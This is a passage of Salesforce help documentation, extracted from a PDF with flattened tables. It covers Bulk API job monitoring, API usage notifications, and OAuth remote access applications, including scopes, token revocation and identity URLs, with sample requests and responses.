Bulk API is based on REST principles and is optimized for loading or deleting large sets of data. You can use it to query,
insert, update, upsert, or delete a large number of records asynchronously by submitting batches which are processed in the
background by Salesforce.

SOAP API, in contrast, is optimized for real-time client applications that update small numbers of records at a time. Although
SOAP API can also be used for processing large numbers of records, when the data sets contain hundreds of thousands of
records, it becomes less practical. Bulk API is designed to make it simple to process data from a few thousand to millions of
records.

The easiest way to use Bulk API is to enable it for processing records in Data Loader using CSV files. This avoids the need
to write your own client application.

When to Use Metadata API

Use Metadata API to retrieve, deploy, create, update, or delete customizations for your organization. The most common use
is to migrate changes from a sandbox or testing organization to your production environment. Metadata API is intended for
managing customizations and for building tools that can manage the metadata model, not the data itself.

The easiest way to access the functionality in Metadata API is to use the Force.com IDE or Force.com Migration Tool. These
tools are built on top of Metadata API and use the standard Eclipse and Ant tools respectively to simplify the task of working
with Metadata API. Built on the Eclipse platform, the Force.com IDE provides a comfortable environment for programmers
familiar with integrated development environments, allowing you to code, compile, test, and deploy all from within the IDE
itself. The Force.com Migration Tool is ideal if you want to use a script or a command-line utility for moving metadata between
a local directory and a Salesforce organization.

When to Use Streaming API

Use Streaming API to receive notifications for changes to data that match a SOQL query that you define.

Streaming API is useful when you want notifications to be pushed from the server to the client. Consider Streaming API for
applications that poll frequently. Applications that have constant polling action against the Salesforce infrastructure, consuming
unnecessary API call and processing time, would benefit from this API which reduces the number of requests that return no
data. Streaming API is also ideal for applications that require general notification of data changes. This enables you to reduce
the number of API calls and improve performance.
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When to use Apex REST API

Use Apex REST API when you want to expose your Apex classes and methods so that external applications can access your
code through REST architecture. Apex REST API supports both OAuth 2.0 and Session ID for authorization.

When to use Apex SOAP API

Use Apex SOAP API when you want to expose your Apex methods as SOAP Web service APIs so that external applications
can access your code through SOAP. Apex SOAP API supports both OAuth 2.0 and Session ID for authorization.

BULK DATA LOAD JOBS

Monitoring Bulk Data Load Jobs
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Data Integrations”To monitor bulk data load jobs:

You can create update, or delete a large volume of records with the Bulk API, which is optimized for processing large sets of
data. It makes it simple to load, update, or delete data from a few thousand to millions of records. Processing a large amount
of records takes some time. This page allows you to monitor the progress of current jobs and the results of recent jobs.

Process a set of records by creating a job that contains one or more batches. The job specifies which object is being processed
and what type of action is being used (query, insert, upsert, update, or delete). A batch is a set of records sent to the server in
an HTTP POST request. Each batch is processed independently by the server, not necessarily in the order it is received.

To track the status of bulk data load jobs that are in progress or recently completed, from Setup, click Monitoring > Bulk
Data Load Jobs or Jobs > Bulk Data Load Jobs.

The In Progress Jobs list contains the following columns, shown in alphabetical order:

DescriptionColumn

The unique, 15–character ID for this job.Job ID

The object type for the data being processed. All data in a job must be of a single object type.Object

The processing operation for all the batches in the job. The valid values are:Operation

• delete

• insert

• query

• upsert

• update

• hardDelete

3661

Monitoring Bulk Data Load JobsApp Integration with Salesforce



DescriptionColumn

The percentage of batches processed relative to the total number of batches submitted. Progress is not
shown when the job is open because the total number of batches in the job is not known until the job is

Progress

closed. Progress may not accurately reflect the number of records processed. Batches may not all contain
the same number of records and they may be processed at different speeds.

The number of records already processed. This number increases as more batches are processed.Records
Processed

The date and time when the job was submitted.Start Time

The current state of processing for the job. The valid values are:Status

• Open: The job has been created, and batches can be added to the job.

• Closed: No new batches can be added to this job. Batches associated with the job may be processed
after a job is closed. You cannot edit or save a closed job.

• Aborted: The job has been aborted.

• Failed: The job has failed. Batches that were successfully processed in the job cannot be rolled back.

The name of the user that submitted the job.Submitted By

The Completed Jobs list contains the following columns, shown in alphabetical order. Completed jobs are removed from the
list seven days after completion.

DescriptionColumn

The date and time when the job completed.End Time

The unique, 15–character ID for this job.Job ID

The object type for the data being processed. All data in a job must be of a single object type.Object

The processing operation for all the batches in the job. The valid values are:Operation

• delete

• insert

• query

• upsert

• update

• hardDelete

The number of records already processed. This number increases as more batches are processed.Records
Processed

The date and time when the job was submitted.Start Time

The current state of processing for the job. The valid values are:Status

• Open: The job has been created, and batches can be added to the job.

• Closed: No new batches can be added to this job. Batches associated with the job may be processed
after a job is closed. You cannot edit or save a closed job.

• Aborted: The job has been aborted.
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DescriptionColumn

• Failed: The job has failed. Batches that were successfully processed in the job cannot be rolled back.

The name of the user that submitted the job.Submitted By

The total time to complete the job.Time to
Complete

See Also:
Viewing Bulk Data Load Job Details

Viewing Bulk Data Load Job Details
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Data Integrations”To monitor bulk data load jobs:

You can create update, or delete a large volume of records with the Bulk API, which is optimized for processing large sets of
data. It makes it simple to load, update, or delete data from a few thousand to millions of records. Processing a large amount
of records takes some time. This page allows you to monitor the progress of current jobs and the results of recent jobs.

To view the details of a bulk data load job:

1. From Setup, click Monitoring > Bulk Data Load Jobs or Jobs > Bulk Data Load Jobs.
2. Click a Job ID link for a job.

The job detail page contains the following fields, shown in alphabetical order:

DescriptionField

The number of milliseconds taken to process triggers and other processes related to the job data. This is
the sum of the equivalent times in all batches in the job. This doesn't include the time used for processing
asynchronous and batch Apex operations. If there are no triggers, the value is 0.

Apex
Processing
Time (ms)

The number of milliseconds taken to actively process the job and includes the time tracked in the Apex
Processing Time (ms) field, but doesn't include the time the job waited in the queue to be processed

API Active
Processing
Time (ms) or the time required for serialization and deserialization. This is the sum of the equivalent times in all

batches in the job.

The API version for the job.API Version

The number of batches that have been completed for this job.Completed
Batches
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DescriptionField

The concurrency mode for processing batches. The valid values are:Concurrency
Mode • parallel: Batches are processed in parallel mode. This is the default value.

• serial: Batches are processed in serial mode.

The content type for the job. The valid values are:Content Type

• CSV—data in CSV format

• XML—data in XML format (default option)

• ZIP_CSV—data in CSV format in a zip file containing binary attachments

• ZIP_XML—data in XML format in a zip file containing binary attachments

The date and time when the job completed.End Time

The name of the external ID field for an upsert().External ID
Field

The number of batches that have failed for this job.Failed
Batches

The unique, 15–character ID for this job.Job ID

The number of batches that are in progress for this job.In Progress
Batches

The object type for the data being processed. All data in a job must be of a single object type.Object

The processing operation for all the batches in the job. The valid values are:Operations

• delete

• insert

• query

• upsert

• update

• hardDelete

The percentage of batches processed relative to the total number of batches submitted. Progress is not
shown when the job is open because the total number of batches in the job is not known until the job is

Progress

closed. Progress may not accurately reflect the number of records processed. Batches may not all contain
the same number of records and they may be processed at different speeds.

The number of batches queued for this job.Queued
Batches

The number of records that were not processed successfully in this job.Records
Failed

The number of records processed at the time the request was sent. This number increases as more batches
are processed.

Records
Processed

The number of times that Salesforce attempted to save the results of an operation. The repeated attempts
are due to a problem, such as a lock contention.

Retries

The date and time when the job was submitted.Start Time
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DescriptionField

The current state of processing for the job. The valid values are:Status

• Open: The job has been created, and batches can be added to the job.

• Closed: No new batches can be added to this job. Batches associated with the job may be processed
after a job is closed. You cannot edit or save a closed job.

• Aborted: The job has been aborted.

• Failed: The job has failed. Batches that were successfully processed in the job cannot be rolled back.

The name of the user that submitted the job.Submitted By

The total time to complete the job.Time to
Complete

The number of milliseconds taken to process the job. This is the sum of the total processing times for all
batches in the job.

Total
Processing
Time (ms)

The job detail page includes a related list of all the batches for the job. The related list provides View Request and View
Response links for each batch. If the batch is a CSV file, the links return the request or response in CSV format. If the batch
is an XML file, the links return the request or response in XML format. These links are available for batches created in API
version 19.0 and later.

The batch related list contains the following fields, shown in alphabetical order:

DescriptionField

The number of milliseconds taken to process triggers and other processes related to the batch data. If
there are no triggers, the value is 0. This doesn't include the time used for processing asynchronous and
batch Apex operations.

Apex
Processing
Time (ms)

The number of milliseconds taken to actively process the batch, and includes Apex processing time. This
doesn't include the time the batch waited in the queue to be processed or the time required for serialization
and deserialization.

API Active
Processing
Time (ms)

The ID of the batch. May be globally unique, but does not have to be.Batch ID

The date and time in the UTC time zone that processing ended. This is only valid when the state is
Completed.

End Time

The number of records that were not processed successfully in this batch.Records
Failed

The number of records processed in this batch at the time the request was sent. This number increases as
more batches are processed.

Records
Processed

The number of times that Salesforce attempted to save the results of an operation. The repeated attempts
are due to a problem, such as lock contention or a batch taking too long to process.

Retry Count

The date and time in the UTC time zone when the batch was created. This is not the time processing
began, but the time the batch was added to the job.

Start Time
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DescriptionField

Contains the reasons for failure if the batch didn't complete successfully.State
Message

The current state of processing for the batch:Status

• Queued: Processing of the batch has not started yet. If the job associated with this batch is aborted,
this batch isn't processed and its state is set to Not Processed.

• In Progress: The batch is currently being processed. If the job associated with this batch is aborted,
this batch is still processed to completion. You must close the job associated with this batch so that
this batch can finish processing.

• Completed: The batch has been processed completely and the result resource is available. The result
resource indicates if some records have failed. A batch can be completed even if some or all the records
have failed. If a subset of records failed, the successful records aren't rolled back.

• Failed: The batch failed to process the full request due to an unexpected error, such as the request
being compressed with an unsupported format, or an internal server error.

• Not Processed: The batch failed to process the full request due to an unexpected error, such as the
request being compressed with an unsupported format, or an internal server error.

The number of milliseconds taken to process the batch. This excludes the time the batch waited in the
queue to be processed.

Total
Processing
Time (ms)

Click the link for a batch to see the request.View Request

Click the link for a batch to see the results.View Result

See Also:
Monitoring Bulk Data Load Jobs
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API USAGE NOTIFICATIONS

About API Usage Notifications
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“API Enabled”To view, create, edit, or delete notifications:

When you create a request usage notification, you specify an administrator to receive an email notification whenever your
organization exceeds a specified limit for the number of API requests made in a specified span of hours.

To view existing API usage notifications, from Setup, click Monitoring > API Usage Notifications.

From the notifications list, you can do any of the following:

• Click Edit or Del to edit or delete an existing notification.

• View the name of the user who will receive the notification.

• View the notification interval, which defines the frequency at which the notifications are sent. For example, if the notification
interval is four hours, a notification will be sent only if the last notification was sent at least four hours ago. Thus, during
a 24-hour period, a maximum of six notifications will be sent.

• View the percent of the limit which, if exceeded, triggers a notification to be sent. For example, if your organization has
a limit of 1,000,000 requests, and you set a threshold percentage of 60 (60%) and a notification interval of 24 hours, when
600,000 API requests have been sent in a 24-hour period, the specified user receives a notification.

• View the name of the user who created the notification and when the notification was created, as well as the last time the
notification was modified, and the name of the user who made the modification.

To create a new notification, click New.

You can create up to ten notifications per organization.

See Also:
Viewing API Usage Notifications
Creating and Editing API Usage Notifications
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Viewing API Usage Notifications
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“API Enabled”To view, create, edit, or delete notifications:

On the API usage notifications detail page, you can view information about a notification:

• Notification Recipient—The username for the person to whom the email notification is sent.

• Threshold—The percent of the usage limit that, when reached, triggers an email notification.

• Notification Interval (Hours)—The frequency at which the notifications are sent. For example, if the notification interval
is four hours, a notification is sent only if the last notification was sent at least four hours ago. Thus, during a 24-hour
period, a maximum of six notifications will be sent.

• Created By—The user who created the notification request, and the time it was created.

• Modified By—The user who last edited the notification.

On this page, you can also create a new notification based on the values of the notification being displayed. Click Clone to
create a new notification with the current values populated in the new notification. You can edit the values before saving.

See Also:
Creating and Editing API Usage Notifications
About API Usage Notifications

Creating and Editing API Usage Notifications
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“API Enabled”To view, create, edit, or delete notifications:

On the API usage metering edit page (from Setup, click Monitoring > API Usage Notifications), you can supply the required
values for a rate-limiting notification:

• The Salesforce user who will receive the notifications.

• The threshold percentage—the percentage of the rate limit that, once exceeded in the specified notification interval, triggers
a notification to be sent to the specified user. Value must be between 0 and 100.

• The time period for which the number of requests is measured, in hours. For example, if the interval is 24, the rate must
be exceeded in the past 24 hours for a notification to be sent.
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If you change the time period, the new time period does not take effect until after the next notification of the existing time
period. For example, assume you have set the time period to send notifications every hour. Then at 4:05 p.m., you set the
time period to send notifications every 24 hours. A last notification from the old time period is sent at 5:00 p.m.. The next
notification would be sent at 5:00 p.m. the next day.

See Also:
Viewing API Usage Notifications
About API Usage Notifications

REMOTE ACCESS APPLICATIONS

Remote Access Application Overview
Available in: All Editions

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

A remote access application is an application external to Salesforce that uses the OAuth protocol to verify both the Salesforce
user and the external application. OAuth is an open protocol that allows secure authentication for access to a user’s data,
without handing out the user’s username and password. It is often described as the valet key of software access: a valet key
only allows access to certain features of your car: you cannot open the trunk or glove compartment using a valet key.

The following is the general flow for using a remote access application with Salesforce:

1. A developer uses the remote access pages in Salesforce (from Setup, in Develop > Remote Access) to define a remote
access application.

In this example, the remote access application is a web application, which uses data that already exists in Salesforce.

2. The developer uses the generated client credentials from the remote access application detail page and develops their web
application using an OAuth library.

3. A user starts to use the developer’s web application and performs an action that requires access to their Salesforce data.
4. The user is redirected to Salesforce using the OAuth protocol, and presented with the standard Salesforce login page.
5. Once the user successfully logs in, the Remote Access Authorization page displays. The user must verify that they want

to grant the web application access to their Salesforce data.
6. When using the Web server flow,

a. If the user approves access, they are redirected back to the originating web application with an authorization code.
b. The web application exchanges this code for an access token, which grants them access to the user’s Salesforce data.

7. When using the user-agent flow, if the user approves access, they are redirected back with an access token.
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Note:  Depending on the authentication flow used, a refresh token might be granted, allowing continued access
to the user’s account.

8. After a user has granted access to a remote access application, he or she can revoke that access by accessing their personal
information page in their personal settings and clicking Deny next to the name of the application in the Remote Access
related list.

While this example illustrates a common use of OAuth, Salesforce supports a number of authentication flows for OAuth 2.0,
so you can authenticate users of Web, JavaScript, desktop, or mobile applications. Salesforce currently supports OAuth versions
1.0.A and 2.0.

Note: Salesforce is compatible with Draft v2–25 of the OAuth 2.0 protocol from the IETF working group.

For more information on the OAuth standard, see the OAuth.net documentation.

For more information on terminology, see Remote Access Applications and OAuth Terminology on page 3714.

Note:  Users can authorize a remote access application to access their Salesforce more than once, for example, for
both a laptop and a desktop computer. The default limit is five per application per user. If a user tries to grant access
to an application more than the organization limit, the access token for that application that hasn’t been used for the
longest period of time is revoked. Newer applications (using the OAuth 2.0 protocol) using the Web server flow are
automatically approved for additional devices after the user has granted access once. The user-agent flow requires
user approval every time.

See Also:
Getting Started with Remote Access Applications

Getting Started with Remote Access Applications
Available in: All Editions

Managed Packages are not available in Database.com

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

Before you start to use remote access applications, you need to consider the following:

• The version of the OAuth protocol to use.

• The type of application your developer is building. This determines which authentication flow to use.

Once you have made these decisions, you can define your remote access application.
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Choosing a Version of the OAuth Protocol

Salesforce.com recommends that developers use the OAuth 2.0 protocol. OAuth 2.0 places a strong emphasis on developer
simplicity, and you may find it easier to develop and integrate applications.

If you have an existing client or platform that leverages OAuth 1.0.A, it may be less work to use that version than to re-engineer
it to use OAuth 2.0.

Determining Which Authentication Flow to Use

OAuth 1.0.A only supports a single authentication flow. See OAuth 1.0.A Authentication Flow.

OAuth 2.0 supports a number of different application flows. These are dependent on the type of client you are developing.

• Web service—OAuth 2.0 Web Server Authentication Flow
• Mobile or desktop application, or JavaScript—OAuth 2.0 User-Agent Flow

Determining Remote Access Application Scope

You might be required by an administrator to limit the access your application has to the assets within an organization. You
can write your application using the scope parameter to achieve this level of control.

See Also:
Defining Remote Access Applications
Remote Access Application Overview

Viewing Remote Access Application Details
Available in: All Editions

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

Use the remote access pages to specify remote access applications that can access a Salesforce instance.

To view the details for a defined application, from Setup, click Develop > Remote Access, and click the name of the application.

From this page you can do any of the following:

• Edit—Change the name, contact information, and so on.

Note: Even if you change the name of the application, the consumer key and consumer secret are not regenerated.

The only way to remove a remote access application from a package is to delete it from your organization.
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• Del—Delete the remote access application.

See Also:
Defining Remote Access Applications
Getting Started with Remote Access Applications

Defining Remote Access Applications
Available in: All Editions

Managed Packages are not available in Database.com

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

Before you start to use remote access applications, you need to consider the following:

• The version of the OAuth protocol to use.

• The type of application your developer is building. This determines which authentication flow to use.

For more information, see Getting Started with Remote Access Applications on page 3670.

To define a remote access application:

1. To define a remote access application, from Setup, click Develop > Remote Access, and click New.
2. Specify the name of the application. This is required. Salesforce.com recommends that the name of the remote access

application match the name of the actual application.
3. Specify the Callback URL, which is required and represents the URL that the user will be returned to after they approve

access for the application. This URL uses HTTPS or another protocol. For OAuth 1.0.A, this value can also be set to
OOB.

Tip:  OAuth 2.0 refers to the callback URL as redirect_uri.

4. If the application has a specific logo, you can specify that using the Logo Image URL. The URL must be secure (use
https). The logo can be a maximum of 200 × 125 pixels. It is displayed on a white background.

5. Specify your Contact Phone and Contact Email. Contact Email is required.
6. In the Info URL field, you can specify a URL where users can go to get more information about the application. The

URL must use https or http protocol, can’t contain spaces, and has a maximum length of 2000 characters.
7. Enter a description of the application. When a user grants access to an application, this description displays.
8. For applications, you can specify No user approval required. This means the application is automatically approved; that

is, the end-user is never asked to approve access. This only works for end-users within your own organization.
9. If you’re setting up an application to login using an assertion, check the Public Key Certificate checkbox. You can

then browse to locate and upload the authentication certificate issued by your certificate authority.
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10. Click Save.

When you save the remote access definition, the consumer key and consumer secret are automatically generated. The consumer
key and consumer secret are available globally in all Salesforce instances.

Note:

• After you save a remote access definition, it may take a few minutes before it becomes available.

• Even if you change the name of the application, the consumer key and consumer secret are not regenerated.

See Also:
Managing Your Remote Access Applications
Getting Started with Remote Access Applications

Deleting Remote Access Applications
Available in: Professional, Enterprise, Unlimited, and Database.com Editions

Managed Packages are not available in Database.com

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

When you delete a remote access application contained in a managed package, access to that application is immediately
removed from all subscribing organizations. The subscribing organizations do not have to wait until a new version of the
managed package is released. Do not delete remote access applications unless you are certain this is the correct behavior.

To delete remote access applications, from Setup, click Develop > Remote Access. In the list of remote access applications,
click Del next to the name of the remote access application to delete.

See Also:
Managing Your Remote Access Applications
Getting Started with Remote Access Applications

3673

Deleting Remote Access ApplicationsCode



Managing Your Remote Access Applications
Available in: All Editions

Salesforce Classic is not available in Database.com

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

A remote access application is an application external to Salesforce that uses the OAuth protocol to verify both the Salesforce
user and the external application. All remote access applications have been integrated with Salesforce, such that they can access
a subset of your Salesforce data once you explicitly grant each application permission.

All remote access applications that have permission to access your Salesforce data are listed in your personal information.

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select Personal Information > Personal Information.
• If you clicked My Settings, select Personal > Advanced User Details.

3. In the Remote Access section, you can:

• View information about each remote access application that you have granted access to, as well as the number of times
and the last time the application attempted to access your information.

Note:

◊ An application may be listed more than once. Each time you grant access to an application, it obtains a
new access token. You must grant access to your Salesforce data from each device that you use, for example,
from both a laptop and a desktop computer. The default limit is five access tokens for each application.
Newer applications (using the OAuth 2.0 protocol) are automatically approved for additional devices after
you've granted access once. OAuth 2.0 applications can be listed more than once. Each row in the table
represents a unique grant, so if an application requests multiple tokens with different scopes, you’ll see the
same application multiple times.

◊ Even if the remote access application tried and failed to access your information because it could not login,
the Use Count and Last Used fields are still updated.

• Click Revoke to revoke the remote access application. After you revoke the application, the application can no longer
use that particular remote access authorization token to access your Salesforce data.

Important:  You must revoke all access tokens for a particular application to prevent it from accessing your
Salesforce data.
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If you're using Salesforce Classic and want to use a new mobile device, download the app on the new device and log in. You
do not need to revoke the token on the old device; Salesforce automatically creates a new one.

See Also:
Defining Remote Access Applications
Getting Started with Remote Access Applications

Scope Parameter Values
Available in: All Editions

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

The scope parameter enables you to fine-tune what the client application can access in a Salesforce organization. The valid
values for scope are:

DescriptionValue

Allows access to the current, logged-in user’s account over the APIs, such as the REST API
or Bulk API. This also includes the chatter_api, allowing access to Chatter API resources.

api

Allows access to only the Chatter API resources.chatter_api

Allows access to all data accessible by the logged-in user. full does not return a refresh
token. You must explicitly request the refresh_token scope to get a refresh token.

full

Allows access only to the identity URL service.id

Allows a refresh token to be returned if you are eligible to receive one.refresh_token

Allows access to Visualforce pages.visualforce

Allows the ability to use the access_token on the Web. This also includes visualforce,
allowing access to Visualforce pages.

web

All scope values automatically include id, so that regardless of which values for scope you pass, you always have access to
the identity URLs.

As a user approves applications, the value of the scope is stored with the refresh token.

For example, if a user approves an application with a scope of id, the refresh token is created with scope=id. Then, if the
user approves a second application with a different scope, for example api, the refresh token is created with scope=api.

For both a JSON or SAML bearer token requests, the request looks at the scopes of all the previous refresh tokens and combines
them.

Given the previous example, the result is an access token with scope=id%20api.
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The following is a sample request setting the scope parameter with the api, id, and web values.

http://login.salesforce.com/services/oauth2/authorize?response_type=token&client_
id=3MVG9lKcPoNINVBKV6EgVJiF.snSDwh6_2wSS7BrOhHGEJkC_&redirect_uri=http://www.example.org/qa/security/oauth
/useragent_flow_callback.jsp&scope=api%20id%20web

See Also:
Managing Your Remote Access Applications

Revoking OAuth Tokens
Available in: All Editions

When users request their data from within the external application (the consumer’s page), they are authenticated. You can
revoke their access tokens, or the refresh token and all related access tokens, using revocation. Developers can use this feature
when configuring a Log Out button in their application.

Revoking Tokens

To revoke OAuth 2.0 tokens, use the revocation endpoint:

https://login.salesforce.com/services/oauth2/revoke

Construct a POST request that includes the following parameters using the application/x-www-form-urlencoded
format in the HTTP request entity-body. For example:

POST /revoke HTTP/1.1
Host: https://login.salesforce.com/services/oauth2/revoke
Content-Type: application/x-www-form-urlencoded

token=currenttoken

If an access token is included, we invalidate it and revoke the token. If a refresh token is included, we revoke it as well as any
associated access tokens.

The authorization server indicates successful processing of the request by returning an HTTP status code 200. For all error
conditions, a status code 400 is used along with one of the following error responses.

• unsupported_token_type—token type not supported
• invalid_token—the token was invalid

For Sandbox, use test.salesforce.com instead of login.salesforce.com.

GET Support

We also support GET requests with the query string parameter token and the current token. If an access token is included,
we invalidate it and revoke the token. If a refresh token is included, we revoke it as well as any associated access tokens. For
example:

https://login.salesforce.com/services/oauth2/revoke?token=currenttokenID
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The authorization server indicates successful processing of the request by returning an HTTP status code 200. For all error
conditions, status code 400 is used.

JSONP Support

The revocation endpoint also accepts GET requests with an additional callback parameter, and returns the response with
content type application/javascript. For example:

https://login.salesforce.com/services/oauth2/revoke?token=XXXXX&callback=myCallback

If the request is successful, a callback is sent to the JavaScript function set in the callback parameter of the GET:

myCallback({});

If the response is not successful, a callback is sent with an error code:

myCallback({"error":"invalid_token"});

See Also:
Using the Access Token

Using the Access Token
Available in: All Editions

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

After a consumer using OAuth version 2.0 has an access token, the method of using the token depends on the API being
used.

• For the REST API, use an HTTP authorization header with the following format Authorization: OAuth
Access_Token

• For the SOAP API, the access token is placed in the Salesforce SOAP authentication header.

• For the identity URL, use either an HTTP authorization header (as with the REST API) or use as an HTTP parameter
oauth_token.
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Using Identity URLs
Available in: All Editions

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

In addition to the access token, an identity URL is also returned as part of a token response, in the id parameter.

The identity URL is both a string that uniquely identifies a user, as well as a RESTful API that can be used to query (with a
valid access token) for additional information about the user. Salesforce returns basic personalization information about the
user, as well as important endpoints that the client can talk to, such as photos for the user, and API endpoints it can access.

The format of the URL is: https://login.salesforce.com/id/orgID/userID, where orgId is the ID of the
Salesforce organization that the user belongs to, and userID is the Salesforce user ID.

Note: For Sandbox, login.salesforce.com is replaced with test.salesforce.com.

The URL must always be HTTPS.

Identity URL Parameters

The following parameters can be used with the access token and identity URL. They are used in an authorization request
header or in a request with the oauth_token parameter. For more details, see Using the Access Token on page 3677.

DescriptionParameter

See Using the Access Token on page 3677.Access token

This parameter is optional. Specify the format of the returned
output. Valid values are:

Format

• urlencoded

• json

• xml

Instead of using the format parameter, the client can also
specify the returned format in an accept-request header using
one of the following:

• Accept: application/json

• Accept: application/xml

• Accept: application/x-www-form-urlencoded

Note the following:

• Wildcard accept headers are allowed. */* is accepted and
returns JSON.

• A list of values is also accepted and is checked left-to-right.
For example:
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DescriptionParameter

application/xml,application/json,application/html,*/*
returns XML.

• The format parameter takes precedence over the accept
request header.

This parameter is optional. Specify a SOAP API version
number, or the literal string, latest. If this value isn’t

Version

specified, the returned API URLs contains the literal value
{version}, in place of the version number, for the client to
do string replacement. If the value is specified as latest, the
most recent API version is used.

This parameter is optional, and is only accepted in a header,
not as a URL parameter. Specify the output to be better

PrettyPrint

formatted. For example, use the following in a header:
X-PrettyPrint:1. If this value isn’t specified, the returned
XML or JSON is optimized for size rather than readability.

This parameter is optional. Specify a valid JavaScript function
name. This parameter is only used when the format is specified

Callback

as JSON. The output is wrapped in this function name
(JSONP.) For example, if a request to
https://server/id/orgid/userid/ returns
{"foo":"bar"}, a request to
https://server/id/orgid/userid/?callback=baz
returns baz({"foo":"bar"});.

Identity URL Response

After making a valid request, a 302 redirect to an instance URL is returned. That subsequent request returns the following
information in JSON format:

• id—The identity URL (the same URL that was queried)
• asserted_user—A boolean value, indicating whether the specified access token used was issued for this identity
• user_id—The Salesforce user ID
• username—The Salesforce username
• organization_id—The Salesforce organization ID
• nick_name—The community nickname of the queried user
• display_name—The display name (full name) of the queried user
• email—The email address of the queried user
• status—The user’s current Chatter status.

◊ created_date:xsd datetime value of the creation date of the last post by the user, for example,
2010-05-08T05:17:51.000Z

◊ body: the body of the post

• photos—A map of URLs to the user’s profile pictures

Note:  Accessing these URLs requires passing an access token. See Using the Access Token on page 3677.
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◊ picture

◊ thumbnail

• urls—A map containing various API endpoints that can be used with the specified user.

Note:  Accessing the REST endpoints requires passing an access token. See Using the Access Token on page 3677.

◊ enterprise (SOAP)
◊ metadata (SOAP)
◊ partner (SOAP)
◊ profile

◊ feeds (Chatter)
◊ feed-items (Chatter)
◊ groups (Chatter)
◊ users (Chatter)
◊ custom_domain—This value is omitted if the organization doesn’t have a custom domain configured and propagated

• active—A boolean specifying whether the queried user is active
• user_type—The type of the queried user
• language—The queried user’s language
• locale—The queried user’s locale
• utcOffset—The offset from UTC of the timezone of the queried user, in milliseconds
• last_modified_date—xsd datetime format of last modification of the user, for example, 2010-06-28T20:54:09.000Z

The following is a response in XML format:

<?xml version="1.0" encoding="UTF-8"?>
<user xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<id>http://na1.salesforce.com/id/00Dx0000001T0zk/005x0000001S2b9</id>
<asserted_user>true</asserted_user>
<user_id>005x0000001S2b9</user_id>
<organization_id>00Dx0000001T0zk</organization_id>
<nick_name>admin1.2777578168398293E12foofoofoofoo</nick_name>
<display_name>Alan Van</display_name>
<email>admin@2060747062579699.com</email>
<status>

<created_date xsi:nil="true"/>
<body xsi:nil="true"/>

</status>
<photos>

<picture>http://na1.salesforce.com/profilephoto/005/F</picture>
<thumbnail>http://na1.salesforce.com/profilephoto/005/T</thumbnail>

</photos>
<urls>

<enterprise>http://na1.salesforce.com/services/Soap/c/{version}/00Dx0000001T0zk
</enterprise>
<metadata>http://na1.salesforce.com/services/Soap/m/{version}/00Dx0000001T0zk
</metadata>
<partner>http://na1.salesforce.com/services/Soap/u/{version}/00Dx0000001T0zk
</partner>
<rest>http://na1.salesforce.com/services/data/v{version}/
</rest>
<sobjects>http://na1.salesforce.com/services/data/v{version}/sobjects/
</sobjects>
<search>http://na1.salesforce.com/services/data/v{version}/search/
</search>
<query>http://na1.salesforce.com/services/data/v{version}/query/
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</query>
<profile>http://na1.salesforce.com/005x0000001S2b9
</profile>

</urls>
<active>true</active>
<user_type>STANDARD</user_type>
<language>en_US</language>
<locale>en_US</locale>
<utcOffset>-28800000</utcOffset>
<last_modified_date>2010-06-28T20:54:09.000Z</last_modified_date>
</user>

The following is a response in JSON format:

{"id":"http://na1.salesforce.com/id/00Dx0000001T0zk/005x0000001S2b9",
"asserted_user":true,
"user_id":"005x0000001S2b9",
"organization_id":"00Dx0000001T0zk",
"nick_name":"admin1.2777578168398293E12foofoofoofoo",
"display_name":"Alan Van",
"email":"admin@2060747062579699.com",
"status":{"created_date":null,"body":null},
"photos":{"picture":"http://na1.salesforce.com/profilephoto/005/F",

"thumbnail":"http://na1.salesforce.com/profilephoto/005/T"},
"urls":

{"enterprise":"http://na1.salesforce.com/services/Soap/c/{version}/00Dx0000001T0zk",
"metadata":"http://na1.salesforce.com/services/Soap/m/{version}/00Dx0000001T0zk",
"partner":"http://na1.salesforce.com/services/Soap/u/{version}/00Dx0000001T0zk",
"rest":"http://na1.salesforce.com/services/data/v{version}/",
"sobjects":"http://na1.salesforce.com/services/data/v{version}/sobjects/",
"search":"http://na1.salesforce.com/services/data/v{version}/search/",
"query":"http://na1.salesforce.com/services/data/v{version}/query/",
"profile":"http://na1.salesforce.com/005x0000001S2b9"},

"active":true,
"user_type":"STANDARD",
"language":"en_US",
"locale":"en_US",
"utcOffset":-28800000,
"last_modified_date":"2010-06-28T20:54:09.000+0000"}

After making an invalid request, the following are possible responses from Salesforce:

Error CodeRequest Problem

403 (forbidden) — HTTPS_RequiredHTTP

403 (forbidden) — Missing_OAuth_TokenMissing access token

403 (forbidden) — Bad_OAuth_TokenInvalid access token

403 (forbidden) — Wrong_OrgUsers in a different organization

404 (not found) — Bad_IdInvalid or bad user or organization ID

404 (not found) — InactiveDeactivated user or inactive organization

404 (not found) — No_AccessUser lacks proper access to organization or information

404 (not found) — No_Site_EndpointRequest to the endpoint of a site

406 (not acceptable) — Invalid_VersionInvalid version
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Error CodeRequest Problem

406 (not acceptable) — Invalid_CallbackInvalid callback

See Also:
Using the Access Token

REMOTE ACCESS APPLICATION AUTHENTICATION

Authenticating Remote Access Application OAuth
Available in: All Editions

User Permissions Needed

“Manage Remote Access”To manage, create, edit, and delete OAuth applications:

When a user requests their Salesforce data from within the external application (the consumer’s page), the user must be
authenticated by Salesforce. There are several steps in each authentication flow, as dictated by the OAuth standard and what
is trying to access Salesforce.

Salesforce supports the following authentication flows:

